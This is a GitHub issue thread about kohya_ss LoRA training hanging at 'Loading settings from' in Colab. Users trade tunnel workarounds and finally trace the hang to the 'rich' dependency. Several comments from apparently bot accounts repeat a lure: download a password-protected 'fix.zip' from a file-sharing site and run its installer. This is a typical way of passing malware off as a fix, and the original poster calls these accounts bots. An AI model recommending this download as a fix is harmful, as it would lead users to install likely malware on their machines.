### ISSUE TITLE
Training stuck at the message "Loading settings from" in the Colab environment.

### ISSUE THREAD

**Issue by Skystapper** [bmaltais/kohya_ss#2740]
The Logs are as per below

06:24:36-282863 INFO     Command executed.                                                          
2024-08-26 06:24:47.122637: E external/local_xla/xla/stream_executor/cuda/cuda_dnn.cc:9261] Unable to register cuDNN factory: Attempting to register factory for plugin cuDNN when one has already been registered
2024-08-26 06:24:47.122681: E external/local_xla/xla/stream_executor/cuda/cuda_fft.cc:607] Unable to register cuFFT factory: Attempting to register factory for plugin cuFFT when one has already been registered
2024-08-26 06:24:47.124173: E external/local_xla/xla/stream_executor/cuda/cuda_blas.cc:1515] Unable to register cuBLAS factory: Attempting to register factory for plugin cuBLAS when one has already been registered
2024-08-26 06:24:48.205464: W tensorflow/compiler/tf2tensorrt/utils/py_utils.cc:38] TF-TRT Warning: Could not find TensorRT
2024-08-26 06:24:49 INFO     Loading settings from                                

I would've marked the issue with the title of TensorRT issue but someone here been saying that it can be ignored because kohya uses pytorch for the training.

I have everything installed with their latest version but the training process gets stuck with the same result every time. I can see that TensorRT is available there, yet as soon as I click on the "Start Training" button I get hit with these cuDDN, cuFFT, cuBLAS and TensorRT errors. If anyone here is working with Kohya in Colab's environment, would you please guide me on how to fix this issue.

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Skystapper** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

I am going to ignore these bots

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Skystapper** [comment]
> I have the same issue

what is most frustrating is that I am making sure the versions of all dependencies are the same as they are mentioned yet every time I run the program, colab is throwing the same error. I have purged the latest cuda version, installed the 11.8 cuda toolkit, made it the default toolkit to be used and still it says that it can't find TensorRT. If it's irrelevant, at least the training process should continue but it won't.

**Comment by dhdc99** [comment]
Same issue here, tried to run accelerate directly in terminal but no success as well.

**Comment by michP247** [comment]
Seems to be some kind of issue when using the gradio share lin in colab, it can't read the .toml file correctly, try creating a tunnel using cloudflare or ngrok when running the kohya gui

**Comment by Bullseye110** [comment]
> Seems to be some kind of issue when using the gradio share link in colab, it can't read the .toml file correctly, works fine when creating a tunnel using cloudflare or ngrok

Hello!
So you say Kohya in Colab works with Ngrok?

**Comment by michP247** [comment]
> > Seems to be some kind of issue when using the gradio share link in colab, it can't read the .toml file correctly, works fine when creating a tunnel using cloudflare or ngrok
> 
> Hello! So you say Kohya in Colab works with Ngrok?

Correction, I used ngrok on kaggle, and cloudflare on colab

**Comment by michP247** [comment]
> I tried ngrok on colab with the latest version of Kohya and it still doesn't work. You sure Cloudflare works? Cuz I wasted the entire day making kohya to work... :(

check this person's repo 
https://github.com/monsterhunters/Lora-Training-GUI

**Comment by Bullseye110** [comment]
> > I tried ngrok on colab with the latest version of Kohya and it still doesn't work. You sure Cloudflare works? Cuz I wasted the entire day making kohya to work... :(
> 
> check this person's repo https://github.com/monsterhunters/Lora-Training-GUI

Thanks!

**Comment by Bullseye110** [comment]
> > > Seems to be some kind of issue when using the gradio share link in colab, it can't read the .toml file correctly, works fine when creating a tunnel using cloudflare or ngrok
> > 
> > 
> > Hello! So you say Kohya in Colab works with Ngrok?
> 
> Correction, I used ngrok on kaggle, and cloudflare on colab

Btw, any idea what code do I need for cloudflare to run on colab? Seems it's impossible for these useless GPT and Claude to give me a working solution.

**Comment by Bullseye110** [comment]
> > I tried ngrok on colab with the latest version of Kohya and it still doesn't work. You sure Cloudflare works? Cuz I wasted the entire day making kohya to work... :(
> 
> check this person's repo https://github.com/monsterhunters/Lora-Training-GUI

Man, this guy changed the setup somehow, so it's working but not only thanks to cloudflare. You should have said that cuz I wasted 2 hours to make cloudflare work on the official Kohya ss from bmaltais and the training still didn't work.
https://github.com/monsterhunters/Lora-Training-GUI - this guy changed way more than only that joke cloudflare tunnel to make kohya ss to work...

**Comment by michP247** [comment]
> > > I tried ngrok on colab with the latest version of Kohya and it still doesn't work. You sure Cloudflare works? Cuz I wasted the entire day making kohya to work... :(
> > 
> > 
> > check this person's repo https://github.com/monsterhunters/Lora-Training-GUI
> 
> Man, this guy changed the setup somehow, so it's working but not only thanks to cloudflare. You should have said that cuz I wasted 2 hours to make cloudflare work on the official Kohya ss from bmaltais and the training still didn't work. https://github.com/monsterhunters/Lora-Training-GUI - this guy changed way more than only that joke cloudflare tunnel to make kohya ss to work... Anyway, thanks for that notebook, but just don't say that it works with cloudflare cuz people will try to run the official Kohya SS GUI from bmaltais through cloudflare thinking that this will fix the issue when in reality it won't fix anything.

Where is the setup "changed"? It's literally installing dependencies + bitsandbytes and clones the kohya sd scripts repo, not sure how else you would run kohya gui besides that. Running the setup would do the same thing

**Comment by Bullseye110** [comment]
> > > > I tried ngrok on colab with the latest version of Kohya and it still doesn't work. You sure Cloudflare works? Cuz I wasted the entire day making kohya to work... :(
> > > 
> > > 
> > > check this person's repo https://github.com/monsterhunters/Lora-Training-GUI
> > 
> > 
> > Man, this guy changed the setup somehow, so it's working but not only thanks to cloudflare. You should have said that cuz I wasted 2 hours to make cloudflare work on the official Kohya ss from bmaltais and the training still didn't work. https://github.com/monsterhunters/Lora-Training-GUI - this guy changed way more than only that joke cloudflare tunnel to make kohya ss to work... Anyway, thanks for that notebook, but just don't say that it works with cloudflare cuz people will try to run the official Kohya SS GUI from bmaltais through cloudflare thinking that this will fix the issue when in reality it won't fix anything.
> 
> Where is the setup "changed"? It's literally installing dependencies + bitsandbytes and clones the kohya sd scripts repo, not sure how else you would run kohya gui besides that. Running the setup would do the same thing

Not really, he changed the "rich" requirement (which was giving that "loading from" stuck error). He removed/replaced rich.
